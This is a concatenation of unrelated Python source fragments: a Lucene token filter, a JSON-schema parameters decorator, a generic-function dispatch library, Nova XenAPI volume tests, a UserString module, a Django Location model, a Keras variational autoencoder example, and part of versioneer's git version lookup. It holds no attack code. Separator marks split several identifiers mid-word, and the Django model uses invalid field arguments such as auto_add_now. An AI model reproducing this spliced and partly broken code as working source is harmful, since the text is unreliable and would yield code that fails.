result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
# patterns for splitting words into substrings
patterns = [
# 32 char md5 sums
"[a-f0-9]{32}",
# '2D', '3D'
"2D", "3D",
# words beginning with capital letters
"[A-Z][a-z]+",
# capital letter sequence ending with a word that begins with a capital letter
"[A-Z]*(?=[A-Z][a-z])",
# capital letter sequence
"[A-Z]{2,}",
# non-capital letter sequence
"[a-z]{2,}" ]
splitPattern = re.compile("|".join(patterns))
class vistrailFilter(PythonTokenFilter):
TOKEN_TYPE_PART = "text"
def __init__(self, input):
super(vistrailFilter, self).__init__(input)
self.input = input
self.parts = [] # parts found for the current token
self.current = None
def next(self):
if self.parts:
# continue adding parts
part = self.parts.pop()
t = Token(part, self.current.startOffset(),
self.current.endOffset(), self.TOKEN_TYPE_PART)
t.setPositionIncrement(0)
return t
else:
# find parts
self.current = self.input.next()
if self.current is None:
return None
text = str(self.current.termText())
pattern = splitPattern.findall(text)
# remove single characters and duplicates
pattern = set([p for p in pattern if len(p)>1 and p != text])
# if len(pattern) > 0:
# print "vistrailFilter", text, "-->",','.join(pattern)
self.parts = pattern
return self.current
|
"""Various miscellaneous functions to make code easier to read & write."""
import collections.abc
import copy
import functools
import inspect
import logging
import urllib.parse
import jsonpointer
import jsonschema
_logger = logging.getLogger("holocron")
def resolve_json_references(value, context, keep_unknown=True):
def _do_resolve(node):
node = copy.copy(node)
if isinstance(node, collections.abc.Mapping) and "$ref" in node:
uri, fragment = urllib.parse.urldefrag(node["$ref"])
try:
return jsonpointer.resolve_pointer(context[uri], fragment)
except KeyError:
if keep_unknown:
return node
raise
elif isinstance(node, collections.abc.Mapping):
for k, v in node.items():
node[k] = _do_resolve(v)
elif isinstance(node, collections.abc.Sequence) and not isinstance(node, str):
if not isinstance(node, collections.abc.MutableSequence):
node = list(node)
| for i in range(len(node)):
node[i] = _do_resolve(node[i])
return node
return _do_resolve(value)
class parameters:
def __init__(self, *, fallback=None, jsonschema=None):
self._fallback = fallback or {}
self._jsonschema = jsonschema
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(app, *a | rgs, **kwargs):
signature = inspect.signature(fn)
arguments = signature.bind_partial(app, *args, **kwargs).arguments
# First two arguments always are an application instance and a
# stream of items to process. Since they are passed by Holocron
# core as positional arguments, there's no real need to check their
# schema, so we strip them away.
arguments = dict(list(arguments.items())[2:])
parameters = dict(list(signature.parameters.items())[2:])
# If some parameter has not been passed, a value from a fallback
# must be used instead (if any).
for param in parameters:
if param not in arguments:
try:
value = resolve_json_references(
{"$ref": self._fallback[param]},
{"metadata:": app.metadata},
)
except (jsonpointer.JsonPointerException, KeyError):
continue
# We need to save resolved value in both arguments and
# kwargs mappings, because the former is used to *validate*
# passed arguments, and the latter to supply a value from a
# fallback.
arguments[param] = kwargs[param] = value
if self._jsonschema:
try:
format_checker = jsonschema.FormatChecker()
@format_checker.checks("encoding", (LookupError,))
def is_encoding(value):
if isinstance(value, str):
import codecs
return codecs.lookup(value)
@format_checker.checks("timezone", ())
def is_timezone(value):
if isinstance(value, str):
import dateutil.tz
return dateutil.tz.gettz(value)
@format_checker.checks("path", (TypeError,))
def is_path(value):
if isinstance(value, str):
import pathlib
return pathlib.Path(value)
jsonschema.validate(
arguments,
self._jsonschema,
format_checker=format_checker,
)
except jsonschema.exceptions.ValidationError as exc:
message = exc.message
if exc.absolute_path:
message = f"{'.'.join(exc.absolute_path)}: {exc.message}"
raise ValueError(message)
return fn(app, *args, **kwargs)
return wrapper
|
# -*- mode: python -*-
from .combinations import STANDARD_METHOD_COMBINATION
from .specializers import specializer, ROOT_SPECIALIZER
from . import util
from .cache import NoCachePolicy, LRU, TypeCachePolicy
import threading
import inspect
import warnings
try:
from ._py_clos import GenericFunction as GenericFunctionBase
except ImportError:
class GenericFunctionBase:
def __call__(self, *args, **kwargs):
return self.call_slow_path(args, kwargs)
def initialize_cache(self, map, size):
pass
class Generic | Function(GenericFunctionBase):
def __init__(self, name):
self._name = name
self._method_combination = STANDARD_METHOD_COMBINATION
self._methods = []
self._specialized_on = []
self._cache_policies = []
self._lock = threading.Lock()
self.clear_cache()
def redefine(self, method_combination=None):
if method_combination is not None:
self | ._method_combination = method_combination
self.clear_cache()
def get_cache_size(self):
return len(self._methods) * 4
def cache_should_grow(self):
for i in self._cache_policies:
if i != TypeCachePolicy:
return False
return True
def clear_cache(self):
if self._cache_policies is None:
self._cache = None
else:
for i in self._cache_policies:
if i != TypeCachePolicy:
self._cache = LRU(self.get_cache_size())
return
self._cache = {}
# the idea is that number of possible types is clearly bounded
# so limiting the cache size is unnecessary
def rebuild_specialized_on(self):
maxlen = max((len(i.specializers) for i in self._methods))
bitmap = [False] * maxlen
for i in self._methods:
for j in i.specialized_on:
bitmap[j] = True
self._specialized_on = [idx for idx, i in enumerate(bitmap) if i]
def rebuild_cache_policies(self):
arglen = max((len(i.specializers) for i in self._methods))
spec_count = len(self._specialized_on)
cps = [[]] * spec_count
for i in self._methods:
for idx, j in enumerate(self._specialized_on):
if j >= len(i.specializers):
continue
spec = i.specializers[j]
if spec is None:
continue
cps[idx].append(spec.cache_policy)
cps = [util.common_superclass(*i) for i in cps]
for i in cps:
if i is NoCachePolicy:
self._cache_policies = None
self._cache_policies = cps
def get_cache_map(self):
maxlen = max((len(i.specializers) for i in self._methods))
key = [b"_"] * maxlen
for idx, cp in zip(self._specialized_on, self._cache_policies):
if not hasattr(cp, "c_cache_key"):
return None
key[idx] = cp.c_cache_key
return b"".join(key).rstrip(b'_')
def initialize_c_cache(self):
cm = self.get_cache_map()
if not cm:
self.initialize_cache(b"", 0, False)
else:
self.initialize_cache(cm,
self.get_cache_size(),
self.cache_should_grow())
def add_method(self, method):
with self._lock:
self._methods.append(method)
self.rebuild_specialized_on()
self.rebuild_cache_policies()
self.initialize_c_cache()
self.clear_cache()
def get_cache_key(self, args):
return tuple((cp.get_cache_key(args[self._specialized_on[idx]])
for idx, cp in enumerate(self._cache_policies)))
def get_applicable_methods(self, args):
return sorted((i for i in self._methods if i.matches(args)),
key=lambda i: i.sort_key(args))
def get_effective_method(self, args):
with self._lock:
methods = self.get_applicable_methods(args)
return self._method_combination.compute_effective_method(methods)
def call_slow_path(self, args, kwargs={}):
if self._cache is not None:
ck = self.get_cache_key(args)
if ck in self._cache:
return self._cache[ck](*args, **kwargs)
effective_method = self.get_effective_method(args)
if self._cache is not None:
self._cache[ck] = effective_method
return effective_method(*args, **kwargs)
class Method:
__slots__ = ["proc", "specializers", "qualifiers", "next_method_arg"]
def __init__(self, proc,
specializers=[],
qualifiers=[],
next_method_arg=None):
self.proc = proc
self.specializers = specializers
self.qualifiers = qualifiers
self.next_method_arg = next_method_arg
@property
def specialized_on(self):
return [idx for idx, i in enumerate(self.specializers) if i != None]
def matches(self, args):
for idx, i in enumerate(self.specializers):
if i is None:
continue
if not i.matches(args[idx]):
return False
return True
def sort_key(self, args):
res = []
for idx, i in enumerate(self.specializers):
if idx >= len(args):
break
if i is None:
i = ROOT_SPECIALIZER
res.append(i.sort_key(args[idx]))
return res
@classmethod
def from_annotated_function(cls, proc, qualifiers=[]):
argspec = inspect.getfullargspec(proc)
arg_names = argspec.args[:len(argspec.args) - len(argspec.defaults or [])]
anno = proc.__annotations__
specializers = [(specializer(anno[i]) if i in anno else None)
for i in arg_names]
return cls(proc,
specializers=specializers,
qualifiers=qualifiers,
next_method_arg=("next_method"
if "next_method" in argspec.args else None))
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
@property
def callable(self):
return self.callable_with_next_method()
def callable_with_next_method(self, next_method=None):
if self.next_method_arg:
def wrapper(*args, **kwargs):
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
return wrapper
else:
return self.proc
def call_method(self, args, kwargs, next_method=None):
if self.next_method_arg:
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
else:
return self.proc(*args, **kwargs)
def defgeneric(name, **kwargs):
gf = GenericFunction(name)
gf.redefine(**kwargs)
return gf
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from nova import test
from nova.tests.xenapi import stubs
from nova.virt.xenapi import volumeops
class VolumeAttachTestCase(test.TestCase):
def test_detach_volume_call(self):
registered_calls = []
def regcall(label):
def side_effect(*args, **kwargs):
registered_calls.append(label)
return side_effect
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(volumeops.vm_utils, 'lookup')
self.mox.StubOutWithMock(volumeops.vm_utils, 'find_vbd_by_number')
self.mox.StubOutWithMock(volumeops.vm_utils, 'is_vm_shutdown')
self.mox.StubOutWithMock(volumeops.vm_utils, 'unplug_vbd')
self.mox.StubOutWithMock(volumeops.vm_utils, 'destroy_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
self.mox.StubOutWithMock(volumeops.volume_utils, 'find_sr_from_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'purge_sr')
volumeops.vm_utils.lookup('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
volumeops.vm_utils.find_vbd_by_number(
'session', 'vmref', 'devnumber').AndReturn('vbdref')
volumeops.vm_utils.is_vm_shutdown('session', 'vmref').AndReturn(
False)
volumeops.vm_utils.unplug_vbd('session', 'vbdref')
volumeops.vm_utils.destroy_vbd('session', 'vbdref').WithSideEffects(
regcall('destroy_vbd'))
volumeops.volume_utils.find_sr_from_vbd(
'session', 'vbdref').WithSideEffects(
regcall('find_sr_from_vbd')).AndReturn('srref')
volumeops.volume_utils.purge_sr('session', 'srref')
self.mox.ReplayAll()
ops.detach_volume(
dict(driver_volume_type='iscsi', data='conn_data'),
'instance_1', 'mountpoint')
self.assertEquals(
['find_sr_from_vbd', 'destroy_vbd'], registered_calls)
def test_attach_volume_call(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=True).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
| ops.attach_volume(
connection_info,
'instance_1', 'mountpoint')
| def test_attach_volume_no_hotplug(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=False).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint', hotplug=False)
def test_connect_volume_no_hotplug(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
instance_name = 'instance_1'
sr_uuid = '1'
sr_label = 'Disk-for:%s' % instance_name
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
vm_ref = 'vm_ref'
dev_number = 1
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.StubOutWithMock(volumeops.vm_utils, 'create_vbd')
volumeops.vm_utils.create_vbd(
session, vm_ref, vdi_ref, dev_number,
bootable=False, osvol=True).AndReturn(vbd_ref)
self.mox.ReplayAll()
ops._connect_volume(connection_info, dev_number, instance_name,
vm_ref, hotplug=False)
self.assertEquals(False, called['VBD.plug'])
def test_connect_volume(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
sr_uuid = '1'
sr_label = 'Disk-for:None'
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.ReplayAll()
ops.connect_volume(connection_info)
self.assertEquals(False, called['VBD.plug'])
|
#!/usr/bin/env python
## vim:ts=4:et:nowrap
"""A user-defined wrapper around string objects
Note: string objects have grown methods in Python 1.6
This module requires Python 1.6 or later.
"""
from types import StringType, UnicodeType
import sys
__all__ = ["UserString","MutableString"]
class UserString:
def __init__(self, seq):
if isinstance(seq, StringType) or isinstance(seq, UnicodeType):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __long__(self): return long(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __contains__(self, char):
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(other + self.data)
else:
return self.__class__(str(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
self.data += other
else:
self.data += str(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width): return self.__class__(self.data.center(width))
def count(self, sub, start=0, end=sys.maxint):
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxint):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxint):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxint):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width): return self.__class__(self.data.ljust(width))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self): return self.__class__(self.data.lstrip())
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxint):
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=sys.maxint):
return self.data.rindex(sub, start, end)
def rjust(self, width): return self.__class__(self.data.rjust(width))
def rstrip(self): return self.__class__(self.data.rstrip())
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxint):
return self.data.startswit | h(prefix, start, end)
def strip(self): return self.__class__(self.data.strip())
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
class MutableString(UserString):
"""mutable string objects
Python strings are i | mmutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
from UserString and than forget thereby to remove (override) the
__hash__ method inherited from ^UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError, "unhashable type (it is mutable)"
def __setitem__(self, index, sub):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + sub + self.data[index+1:]
def __delitem__(self, index):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + self.data[index+1:]
def __setslice__(self, start, end, sub):
start = max(start, 0); end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start]+sub.data+self.data[end:]
elif isinstance(sub, StringType) or isinstance(sub, UnicodeType):
self.data = self.data[:start]+sub+self.data[end:]
else:
self.data = self.data[:start]+str(sub)+self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
if __name__ == "__main__":
# execute the regression test to stdout, if called as a script:
import os
called_in_dir, called_as = os.path.split(sys.argv[0])
called_in_dir = os.path.abspath(called_in_dir)
called_as, py = os.path.splitext(called_as)
sys.path.append(os.path.join(called_in_dir, 'test'))
if '-q' in sys.argv:
import test_support
test_support.verbose = 0
__import__('test_' + called_as.lower())
|
from django.contrib.auth.models import User
from djang | o.core.urlresolvers import reverse
from django.db import models
class Location(models.Model):
address = models.CharField(blank=True)
latitude = models.DecimalField(max_digits=10, decimal_places=6)
longitude = models.DecimalField(max_digits=10, decimal_places=6)
created = models.DateTimeField(auto_add_now=True, editable=False)
updated = models.DateTimeField(auto_add=True, editable=False)
owner = models.ForeignKey(User)
def get_absolute_url(self) | :
return reverse('location-detail', args=[str(self.id)])
def __str__(self):
return '{id: %d, latitude: %d, longitude: %d}' % (
self.id,
self.latitude,
self.longitude
)
class Meta:
app_label = 'locations'
get_latest_by = 'updated'
ordering = ['updated']
verbose_name = 'location'
verbose_name_plural = 'Locations'
|
'''This script demonstrates how to build a variational autoencoder
with Keras and deconvolution layers.
Reference: "Auto-Encoding Variational Bayes" https://arxiv.org/abs/1312.6114
'''
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras.datasets import mnist
# input image dimensions
img_rows, img_cols, img_chns = 28, 28, 1
# number of convolutional filters to use
filters = 64
# convolution kernel size
num_conv = 3
batch_size = 100
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
latent_dim = 2
intermediate_dim = 128
epsilon_std = 1.0
epochs = 5
x = Input(batch_shape=(batch_size,) + original_img_size)
conv_1 = Conv2D(img_chns,
kernel_size=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(filters,
kernel_size=(2, 2),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_2)
conv_4 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(batch_size, latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(filters * 14 * 14, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 14, 14)
else:
output_shape = (batch_size, 14, 14, filters)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(filters,
kernel_size=num_conv,
padding='same',
strides=1,
activation='relu')
decoder_deconv_2 = Conv2DTranspose(filters, num_conv,
padding='same',
strides=1,
activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 29, 29)
else:
output_shape = (batch_size, 29, 29, filters)
decoder_deconv_3_upsamp = Conv2DTranspose(filters,
kernel_size=(3, 3),
strides=(2, 2),
padding='valid',
activation='relu')
decoder_mean_squash = Conv2D(img_chns,
kernel_size=2,
padding='valid',
activation='sigmoid')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_me | an_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_l | og_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
vae.compile(optimizer='rmsprop', loss=None)
vae.summary()
# train the VAE on MNIST digits
(x_train, _), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_train = x_train.reshape((x_train.shape[0],) + original_img_size)
x_test = x_test.astype('float32') / 255.
x_test = x_test.reshape((x_test.shape[0],) + original_img_size)
print('x_train.shape:', x_train.shape)
vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, x_test))
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
|
f verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
